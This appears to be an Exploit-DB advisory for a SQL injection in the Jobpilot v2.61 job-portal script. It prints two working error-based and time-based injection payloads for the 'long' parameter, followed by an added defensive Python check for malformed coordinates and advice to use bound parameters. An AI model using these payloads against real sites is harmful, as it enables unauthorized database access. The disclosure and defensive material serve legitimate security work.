[webapps] Jobpilot v2.61 - SQL Injection
source link: https://www.exploit-db.com/exploits/51527
EDB-ID: 51527
EDB Verified:
# Exploit Title: Jobpilot v2.61 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
# Demo Site: https://jobpilot.templatecookie.com
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
Parameter: long (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT (ELT(4894=4894,1))),0x71786b7171)) AND (1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL Fire Contract Counties, California, United States&category=&price_min=&price_max=&tag=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND (1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL Fire Contract Counties, California, United States&category=&price_min=&price_max=&tag=
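
A defensive check for the parameters named in the PoC, as an added example that is not part of the original advisory or Jobpilot's code: it flags query strings in which `lat` or `long` is repeated or is not a plain decimal within coordinate range. The function name, the decimal pattern and the sample query strings are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Valid ranges for the two coordinate parameters seen in the PoC request.
COORD_RANGES = {"lat": (-90.0, 90.0), "long": (-180.0, 180.0)}
# Assumed strict format: optional sign, up to 3 integer digits, optional fraction.
DECIMAL = re.compile(r"-?\d{1,3}(?:\.\d{1,15})?")


def coordinate_findings(query_string):
    """Return reasons why lat/long in a raw query string look suspect."""
    values = {}
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if name in COORD_RANGES:
            values.setdefault(name, []).append(value)

    findings = []
    for name, seen in values.items():
        if len(seen) > 1:
            # Parsers differ on which duplicate wins, so a filter and the
            # application may end up inspecting different values.
            findings.append(f"{name}: sent {len(seen)} times")
        low, high = COORD_RANGES[name]
        for value in seen:
            if not DECIMAL.fullmatch(value):
                findings.append(f"{name}: not a plain decimal: {value[:40]!r}")
            elif not low <= float(value) <= high:
                findings.append(f"{name}: out of range: {value[:40]!r}")
    return findings


# Constructed sample query strings (not taken from any real log).
SAMPLES = [
    "keyword=dev&lat=34.0536909&long=-118.242766&category=",
    "keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND (1=1",
    "keyword=1&lat=91&long=nan",
]

if __name__ == "__main__":
    for qs in SAMPLES:
        print(qs, "->", coordinate_findings(qs) or "ok")
```

The same strict numeric check belongs in server-side input validation, with the coordinates then passed to the database as bound parameters rather than concatenated into the query text.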